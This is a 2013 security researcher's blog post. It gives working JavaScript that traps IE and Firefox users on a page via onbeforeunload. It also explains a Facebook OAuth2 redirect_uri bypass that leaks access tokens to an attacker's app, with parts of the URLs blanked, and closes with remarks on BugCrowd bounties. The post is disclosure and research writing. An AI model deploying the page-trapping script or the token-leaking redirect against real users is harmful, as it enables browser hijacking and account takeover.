Monthly Archives: March 2013

IE/Firefox Redirection Issue – FB Oauth2 Bypass – BugCrowd

To keep a record of the little things I have done since my last blog post:

1- IE/Firefox – Page Redirection Hijack

Several weeks ago, I reported an interesting PoC via my Twitter in which I had created a web page that stops Firefox and IE browsers to redirect users to their intended destination even if they had typed it directly in the address bar:

This issue is still unpatched in the latest versions of these browsers (March 2013). Unfortunately, some advert companies are currently exploiting this issue as well. I have already reported it to Mozilla:

Example 1: No Redirection Ever:

Here is the Javascript code that does this:

window.onbeforeunload = function(){

      //Unredirectable Page

      setTimeout("window.location=document.location;alert('delay by alert');",0);


Example 2: This always redirects you to

Here is the Javascript code that does this:

window.onbeforeunload = function(){

//Unredirectable Page

setTimeout("window.location='';alert('delay by alert');",0);


2- Facebook OAuth2 Bypass

Facebook OAuth2 yet another redirection bypass! I only found one issue which was very similar to what Nir Goldshlager ( and Egor Homakov ( had reported to Facebook. I highly recommend their blog posts about Facebook Oauth2 for reading and learning!

Here is what I have found in Facebook:

The following URL could send your sessions to attacker’s domain and he could hijack your OAuth token: Link,,,,&redirect_uri=

It used to work in all the browsers. However, you needed to find an authorised Facebook app in order to be able to exploit this issue.

A short description:

– “/////” in the URL -> to bypass IE problem with Facebook redirection

– “candycrush1” -> to redirect the user to a normal user page instead of candycrush game! “” takes you to a user page instead of an App!

– “%2523” and “%23” -> to remove # in the final URL and send the token directly in the URL.

The result of loading that URL was:

in which “testrdirsdl” is my app that can store the tokens in “” (it does not have logging functionality at the moment!)

3- BugCrowd!

I attended several bounties and gladly received $$$ for private and public bounties! I liked the charity ones as well :-)

If you want to test live and different websites without having legal obligations (well, I hope they can provide us with a signed document per project very soon!), it is the right place. I recommend it to the people who want to have fun and increase their web app. security testing skills.

Unfortunately, the recent bounties from BugCrowd did not have fair prizes and I guess it is because of the companies budgets. Moreover, we still need them to come up with the hall of fame table! As soon as they sort these out, I will become more interested!

That’s it for now. Thanks for your time.